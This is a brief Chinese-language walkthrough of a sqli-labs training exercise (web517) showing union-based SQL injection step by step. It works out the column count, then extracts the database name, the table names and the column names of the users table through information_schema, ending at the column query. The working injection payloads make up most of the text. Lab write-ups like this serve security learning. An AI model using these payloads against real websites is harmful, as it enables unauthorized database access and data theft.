- sqli-labs–web517
(1)判断字段数
?id=-1' order by 3 --+
当order by 4时会报错,说明只有3个字段。
(2)判断注入点&查询库名
?id=-1' union select 1,2,3 --+
?id=-1' union select 1,2,database() --+
执行第一句话,发现只有2,3位置的能进行注入。
执行第二句话,发现库名叫做security。
(3)查询表名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
执行完后,发现有emails,referers,uagents,users表。
(4)查询列名
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+